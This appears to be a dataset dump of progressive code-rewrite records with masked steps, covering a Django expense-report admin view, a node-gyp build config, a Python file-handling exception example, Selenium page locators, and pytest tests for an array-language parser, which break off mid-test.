"step-2": "<mask token>\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect('login')\n title = 'Accueil'\n today = datetime.now()\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n context = {'title': title, 'user': request.user, 'fiche_frais':\n fiche_frais, 'lignes_frais_forfait': lignes_frais_forfait,\n 'lignes_frais_hors_forfait': lignes_frais_hors_forfait, 'etat':\n etat, 'today': today, 'frais_forfait': frais_forfait}\n return render(request, 'fichefrais/administrateur/home_admin.html', context\n )\n",
"step-3": "from django.shortcuts import render, redirect\nfrom datetime import datetime\nfrom fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect('login')\n title = 'Accueil'\n today = datetime.now()\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n context = {'title': title, 'user': request.user, 'fiche_frais':\n fiche_frais, 'lignes_frais_forfait': lignes_frais_forfait,\n 'lignes_frais_hors_forfait': lignes_frais_hors_forfait, 'etat':\n etat, 'today': today, 'frais_forfait': frais_forfait}\n return render(request, 'fichefrais/administrateur/home_admin.html', context\n )\n",
"step-4": "from django.shortcuts import render, redirect\nfrom datetime import datetime\nfrom fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect(\"login\")\n\n title = \"Accueil\"\n today = datetime.now()\n\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n\n context = {\n \"title\": title,\n \"user\": request.user,\n \"fiche_frais\": fiche_frais,\n \"lignes_frais_forfait\": lignes_frais_forfait,\n \"lignes_frais_hors_forfait\": lignes_frais_hors_forfait,\n \"etat\": etat,\n \"today\": today,\n \"frais_forfait\": frais_forfait,\n }\n\n return render(request, \"fichefrais/administrateur/home_admin.html\", context)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
{
"targets": [
{
"target_name": "force-layout",
"sources": [ "src/main.cc", "src/layout.cc", "src/quadTree.cc" ],
'conditions': [
['OS=="win"', {
'cflags': [
'/WX', "/std:latest", "/m"
],
}, { # OS != "win"
'cflags': [
"-std=c++11", "-fpermissive", "-fexceptions"
],
}],
],
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ]
}
]
}
|
normal
|
{
"blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1",
"index": 8439,
"step-1": "<mask token>\n",
"step-2": "{'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc',\n 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS==\"win\"', {\n 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11',\n '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'],\n 'cflags_cc!': ['-fno-exceptions']}]}\n",
"step-3": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
fh = open('testfile.txt', 'w')
fh.write('This is my test file for exception handling! !')
except IOError:
print("Error: can't find file or read data")
else:
print('written content in the file successfully')
fh = open('testfile.txt', 'r+')
print(fh.read())
fh.close()
print(fh.closed)
try:
fileptr = open('file.txt', 'w')
try:
fileptr.write('Hi I am good')
finally:
fileptr.close()
print('file.closed')
except:
print('Error')
else:
print('inside else block')
try:
age = int(input('Enter the age?'))
if age < 18:
raise ValueError
else:
print('the age is valid')
except ValueError:
print('The age is not valid')
<|reserved_special_token_1|>
'''import math
x = 5
print("sqrt of 5 is", math.sqrt(64))
str1 = "bollywood"
str2 = 'ody'
if str2 in str1:
print("String found")
else:
print("String not found")
print(10+20)'''
#try:
#block of code
#except Exception l:
#block of code
#else:
#this code executes if except block is executed
try:
fh = open("testfile.txt", "w")
fh.write("This is my test file for exception handling! !")
except IOError:
print("Error: can\'t find file or read data")
else:
print("written content in the file successfully")
fh = open("testfile.txt", "r+")
print(fh.read())
fh.close()
print(fh.closed)
try:
fileptr = open("file.txt", "w")
try:
fileptr.write("Hi I am good")
finally:
fileptr.close()
print("file.closed")
except:
print("Error")
else:
print("inside else block")
try:
age = int(input("Enter the age?"))
if age<18:
raise ValueError
else:
print("the age is valid")
except ValueError:
print("The age is not valid")
|
flexible
|
{
"blob_id": "c5b40b373953a2375eeca453a65c49bdbb8715f1",
"index": 6586,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n fh = open('testfile.txt', 'w')\n fh.write('This is my test file for exception handling! !')\nexcept IOError:\n print(\"Error: can't find file or read data\")\nelse:\n print('written content in the file successfully')\n fh = open('testfile.txt', 'r+')\n print(fh.read())\n fh.close()\n print(fh.closed)\ntry:\n fileptr = open('file.txt', 'w')\n try:\n fileptr.write('Hi I am good')\n finally:\n fileptr.close()\n print('file.closed')\nexcept:\n print('Error')\nelse:\n print('inside else block')\ntry:\n age = int(input('Enter the age?'))\n if age < 18:\n raise ValueError\n else:\n print('the age is valid')\nexcept ValueError:\n print('The age is not valid')\n",
"step-3": "'''import math\nx = 5\nprint(\"sqrt of 5 is\", math.sqrt(64))\n\nstr1 = \"bollywood\"\n\nstr2 = 'ody'\n\nif str2 in str1:\n print(\"String found\")\nelse:\n print(\"String not found\")\n\n print(10+20)'''\n\n#try:\n #block of code\n#except Exception l:\n #block of code\n#else:\n #this code executes if except block is executed\n\ntry:\n fh = open(\"testfile.txt\", \"w\")\n fh.write(\"This is my test file for exception handling! !\")\n\nexcept IOError:\n print(\"Error: can\\'t find file or read data\")\nelse:\n\n print(\"written content in the file successfully\")\n\n fh = open(\"testfile.txt\", \"r+\")\n print(fh.read())\n fh.close()\n print(fh.closed)\n\ntry:\n fileptr = open(\"file.txt\", \"w\")\n try:\n fileptr.write(\"Hi I am good\")\n\n\n finally:\n fileptr.close()\n print(\"file.closed\")\nexcept:\n print(\"Error\")\nelse:\n print(\"inside else block\")\n\n\ntry:\n age = int(input(\"Enter the age?\"))\n if age<18:\n raise ValueError\n else:\n print(\"the age is valid\")\nexcept ValueError:\n print(\"The age is not valid\")\n\n\n\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoginPageLocators:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoginPageLocators:
LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'
REGISTER_FORM = By.CSS_SELECTOR, '#register_form'
REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'
REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,
'#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,
'[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BasePageLocators:
LOGIN_LINK = By.CSS_SELECTOR, '#login_link'
BASKET_LINK = By.CSS_SELECTOR, '[class="btn btn-default"]:nth-child(1)'
USER_ICON = By.CSS_SELECTOR, '.icon-user'
class LoginPageLocators:
LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'
REGISTER_FORM = By.CSS_SELECTOR, '#register_form'
REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'
REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,
'#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,
'[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
from selenium.webdriver.common.by import By
class BasePageLocators:
LOGIN_LINK = (By.CSS_SELECTOR, "#login_link")
BASKET_LINK = (By.CSS_SELECTOR, '[class="btn btn-default"]:nth-child(1)')
USER_ICON = (By.CSS_SELECTOR, ".icon-user")
class LoginPageLocators:
LOG_IN_FORM = (By.CSS_SELECTOR, "#login_form")
REGISTER_FORM = (By.CSS_SELECTOR, "#register_form")
REGISTRATION_EMAIL = (By.CSS_SELECTOR, '#id_registration-email')
REGISTRATION_PASSWORD = (By.CSS_SELECTOR, '#id_registration-password1')
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR, '#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR, '[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = (By.CSS_SELECTOR, '#content_inner')
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = (By.CSS_SELECTOR, '.btn-add-to-basket')
SHIPMENT_PRICE = (By.CSS_SELECTOR, '.product_main .price_color')
SHIPMENT_NAME = (By.CSS_SELECTOR, '.product_main h1')
|
flexible
|
{
"blob_id": "5d3b9005b8924da36a5885201339aa41082034cd",
"index": 8692,
"step-1": "<mask token>\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-2": "<mask token>\n\n\nclass LoginPageLocators:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-3": "<mask token>\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'\n REGISTER_FORM = By.CSS_SELECTOR, '#register_form'\n REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'\n REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,\n '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,\n '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-4": "<mask token>\n\n\nclass BasePageLocators:\n LOGIN_LINK = By.CSS_SELECTOR, '#login_link'\n BASKET_LINK = By.CSS_SELECTOR, '[class=\"btn btn-default\"]:nth-child(1)'\n USER_ICON = By.CSS_SELECTOR, '.icon-user'\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'\n REGISTER_FORM = By.CSS_SELECTOR, '#register_form'\n REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'\n REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,\n '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,\n '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-5": "from selenium.webdriver.common.by import By\n\n\nclass BasePageLocators:\n LOGIN_LINK = (By.CSS_SELECTOR, \"#login_link\")\n BASKET_LINK = (By.CSS_SELECTOR, '[class=\"btn btn-default\"]:nth-child(1)')\n USER_ICON = (By.CSS_SELECTOR, \".icon-user\")\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = (By.CSS_SELECTOR, \"#login_form\")\n REGISTER_FORM = (By.CSS_SELECTOR, \"#register_form\")\n REGISTRATION_EMAIL = (By.CSS_SELECTOR, '#id_registration-email')\n REGISTRATION_PASSWORD = (By.CSS_SELECTOR, '#id_registration-password1')\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR, '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR, '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = (By.CSS_SELECTOR, '#content_inner')\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = (By.CSS_SELECTOR, '.btn-add-to-basket')\n SHIPMENT_PRICE = (By.CSS_SELECTOR, '.product_main .price_color')\n SHIPMENT_NAME = (By.CSS_SELECTOR, '.product_main h1')\n\n",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',
NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
import pytest
from moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function
from moa.yaccer import build_parser
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',
NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
